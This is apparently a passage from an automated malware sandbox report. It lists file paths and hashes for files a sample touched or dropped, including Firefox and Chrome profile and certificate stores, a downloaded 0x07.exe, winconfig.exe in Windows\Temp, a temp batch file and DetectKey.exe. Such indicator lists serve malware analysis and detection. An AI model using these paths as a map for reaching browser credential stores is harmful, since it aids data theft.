| SHA512 | c259176177fd4af68e31d9e5cef4ad6447375edc91be93048a257de67643c15a64424e5a2ab095a1b9a0acdf86bf562e1b351b480dd6afa8cb9f873dea7fa312 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\cert9.db
| MD5 | b64275a33eb7b9f26f932348724632d9 |
| SHA1 | cb85b2bb50eb14e20ec43cd3169aa300957ae238 |
| SHA256 | cddcfaa498d1775372bf7fa78cb8e18605a82093ca5f731600098f0c50d4a759 |
| SHA512 | 4358c9d8df7d30920a5d3d77b664eed87bdada505f3b5fd50d56f94813b092f589a1a5034917c110e3fa347b6fa3e0283b4ea9f9d217314aee228e52f2c99287 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | fab7308147a89072f981ab0bf0b7a259 |
| SHA1 | 577558f6c5018af98f2d776e3d2c834ef88eec15 |
| SHA256 | 987d087fefc2ba16b914205a66d2d1879d89e87e85e9b67a5d34ede340601eb5 |
| SHA512 | ac9c5cebed8aaacc4e5152f2b53e16ebacc7f265ec2a13cafa6cd66df275c051dca881882f898666751a1b6020eaee3c5b3d5db7e05d1a2ac6fd935608bb1274 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\sessionCheckpoints.json.tmp
| MD5 | 99601438ae1349b653fcd00278943f90 |
| SHA1 | 8958d05e9362f6f0f3b616f7bfd0aeb5d37967c9 |
| SHA256 | 72d74b596f7fc079d15431b51ce565a6465a40f5897682a94a3f1dd19b07959a |
| SHA512 | ffa863d5d6af4a48aadc5c92df4781d3aacbf5d91b43b5e68569952ffec513ff95655b3e54c2161fe27d2274dd4778bad517c7a3972f206381ef292808628c55 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\prefs-1.js
| MD5 | 8f48dbf42240c4d93b16f18d56407fbf |
| SHA1 | 20d36d41573625f317dcc5636387a5cae6a88d81 |
| SHA256 | 22204c82acae2b44a440ebd114c35ca0111a9d116f5121ec7a9142cd600c5ec2 |
| SHA512 | 10b662e0cd8f621967589c9737d1b48f29cabe06ac3f508fdcfe640ab2258c0b1eb929f1e04a148e2b7405cb936aa0f3082fbf44399df9ca6c7a6553e24ca5d4 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\sessionCheckpoints.json.tmp
| MD5 | 948a7403e323297c6bb8a5c791b42866 |
| SHA1 | 88a555717e8a4a33eccfb7d47a2a4aa31038f9c0 |
| SHA256 | 2fca1f29b73dd5b4159fa1eb16e69276482f5224ba7d2219a547039129a51f0e |
| SHA512 | 17e2f65c33f47c8bb4beca31db2aff3d4bbb6c2d36924057f9f847e207bdcb85ffcbb32c80dd06862ffc9b7f0bd3f5e2e65b48bb1bc3363732751101d5596b1a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\sessionstore.jsonlz4
| MD5 | ffb8a64fe671268d3667e8ebef361070 |
| SHA1 | d1c1fc673d05d22c03e6d640731a94a33a2e419d |
| SHA256 | dd999e2ddb7306157cfdf4c22b375d2e00d4db636eec4d4c97019f115a70fc3a |
| SHA512 | 80c4d7ed786778d30392053ebd4dd19a5195d8a32473a49f643973aeb8b0a47940d54f98af8c63d79fe8cebc6ed31d0a43041edb95641f3061ee4935acb5726f |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\sessionCheckpoints.json.tmp
| MD5 | 65690c43c42921410ec8043e34f09079 |
| SHA1 | 362add4dbd0c978ae222a354a4e8d35563da14b4 |
| SHA256 | 7343d5a46e2fca762305a4f85c45484a49c1607ede8e8c4bd12bedd2327edb8d |
| SHA512 | c0208d51cf1586e75f22764b82c48ecbb42c1ff54aa412a85af13d686e0119b4e49e98450d25c70e3792d3b9c2cda0c5ab0c6931ebaf548693bb970a35ae62b9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 3fdbe9561ed5357bafb220f5cd3b5dc6 |
| SHA1 | 72c8fce863f13bff5f1bbac94868271c02e3ffd4 |
| SHA256 | d6910f7a934cdee9a1814af323f3ee832553a82bf929de703029e98aa6dd4e3a |
| SHA512 | d78ecce1eca8bfcd5507f83c4441ee1feb96bfe284cf724d61782c4cf5d0cca7870605ba51d07379b3fd53fc82f641bfa7f04f9d191a61ad7d4960a7c2700f49 |
C:\Users\Admin\Downloads\0x07.exe
| MD5 | 733eb0ab951ae42a8d8cca413201e428 |
| SHA1 | 640ffb3ee44eb86afaea92e6c5aa158a5d4aafd1 |
| SHA256 | 52d6d769eb474d4138ac31e05634a6ca7a4ebef5920f8356c1cd70d9fa42c2fb |
| SHA512 | c7cdf77aa881c5dbb2abf17913dbf645fe88e16fa11fa055392d36ccf936fc43050c48feb631e193fe044123a190f123d2d6ff12234c0ff7c8c7c6e290209d8f |
C:\Users\Admin\Downloads\0x07.exe:Zone.Identifier
| MD5 | 0f98a5550abe0fb880568b1480c96a1c |
| SHA1 | d2ce9f7057b201d31f79f3aee2225d89f36be07d |
| SHA256 | 2dfb5f4b33e4cf8237b732c02b1f2b1192ffe4b83114bcf821f489bbf48c6aa1 |
| SHA512 | dbc1150d831950684ab37407defac0177b7583da0fe13ee8f8eeb65e8b05d23b357722246888189b4681b97507a4262ece96a1c458c4427a9a41d8ea8d11a2f6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | df07552a98cecfa7f5322ecf05456dc8 |
| SHA1 | e1a51cf929dfbb2483a8a4af8593747639981ce3 |
| SHA256 | 69c8ab5ebdb6ebc6456c768d911d28c20339d3f7d8358d7cb4ba7bd4da75e8ef |
| SHA512 | fe90b829a0c653dd50e2aaf06e2ac8047b8452b07d41f7f7ef9710e62208ea22f4104bfcb6facf249da8c8309842fbffc3f4f7fbf08fb6d888c77cdac918296d |
C:\Windows\Temp\winconfig.exe
| MD5 | 11d457ee914f72a436fa4a8a8f8446dd |
| SHA1 | d0308ca82ed9716b667e8e77e9ae013b9af44116 |
| SHA256 | c55e98b21e7e8639d4a6702de75bccc47b337bc639ea33231a507946f74964ef |
| SHA512 | 4c861cb0fa7170d6c71e11b3a826d1802ff0f9d029cfefa7428655929d5bab4bf56abeeb963e4927def3e959f2d4a0f199c8c3bf3ecbef8885189a52eeef666b |
C:\Users\Admin\AppData\Local\Temp\D82B.tmp\D82C.tmp\D82D.bat
| MD5 | a645734f3bf4a2682cbaf546789ec0c4 |
| SHA1 | fafcc11909412bf51f217e12dfaa93a15181a3e2 |
| SHA256 | 3b9b5b1659a881d15962541fb56638379a6e5b5d02435f8c50574ec003bc64b0 |
| SHA512 | efa399503b982eda2058a70b10289275fe3c51280bdbb649be40cc3f17c6085267236dc0f6f8bbbf782105e6f5510e6dbbd97de8e87113abc1d8c340ccad9a6d |
C:\Users\Admin\AppData\Roaming\DetectKey.exe
| MD5 | aba9a3cf4e1db4602c25405987b809a6 |
| SHA1 | 6cd545ea023ce9cdfe76607c6801cc11ff7d9e80 |
| SHA256 | 490df924cadff4806ad1c1a261c71f7e06320826eda532394462e7ee32c570d6 |
| SHA512 | e5a9e28549bab93f5cf2464707b3b46859271dea16f69e8757b00f79989b2665d3b9bc3d9794d1d9e1111f8ee03ecb933f1fadfcd2adeb695dc0fce0b8f90675 |